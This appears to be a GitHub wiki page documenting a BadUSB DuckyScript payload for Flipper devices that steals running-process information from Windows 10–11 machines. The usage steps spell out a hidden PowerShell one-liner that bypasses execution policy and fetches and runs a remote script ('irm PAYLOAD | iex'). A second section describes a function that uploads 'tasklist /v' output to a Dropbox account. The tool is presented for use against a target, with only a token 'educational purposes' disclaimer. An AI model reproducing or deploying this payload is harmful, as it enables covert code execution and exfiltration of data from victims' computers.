Exfiltrate Process Info Windows - aleff-github/my-flipper-shits GitHub Wiki

DuckyScript Documentation

This DuckyScript is a tool for exfiltrating process information from a Windows 10 or 11 system. It was authored by Aleff, and is version 1.0. The category is exfiltration.

Script Information

  • Title: Exfiltrate Process Info
  • Author: Aleff
  • Version: 1.0
  • Category: Exfiltration
  • Target: Windows 10-11

Requirements

Before using this tool, you will need the following:

  • An internet connection
  • A Dropbox webhook

Usage

The following steps explain how to use this DuckyScript to exfiltrate process information:

  1. Ensure that you have met the requirements listed above.
  2. Define the payload by replacing example.com with your link. The payload should be ExfiltrateProcessInfo.ps1.
  3. Wait for 2 seconds.
  4. Press the Windows key and the R key (GUI r).
  5. Wait for 250 milliseconds.
  6. Type powershell -w h -ep bypass irm.
  7. Type PAYLOAD.
  8. Type | iex.
  9. Press the Enter key.

The tool will then exfiltrate the process information from the target system to your Dropbox webhook.

Disclaimer

This tool is provided for educational purposes only. Use it at your own risk. The author and OpenAI assume no responsibility for any misuse or damage that may result from using this tool.

PowerShell Documentation

This PowerShell function is a tool for exfiltrating process information from a Windows system.

Usage

To use this function, you can simply call the ExfiltrateProcessInfo function. The function will do the following:

  1. Create a temporary file to store the process information.
  2. Run the tasklist /v command to get the process information and save the output to the temporary file.
  3. Define the Dropbox file path as /tasklist_output.txt.
  4. Set the Dropbox access token as an empty string.
  5. Get the content of the temporary file.
  6. Set the upload URL as https://content.dropboxapi.com/2/files/upload.
  7. Set the headers required for the Dropbox API call, including the access token, Dropbox API arguments, and content type.
  8. Use Invoke-RestMethod to upload the file content to Dropbox.
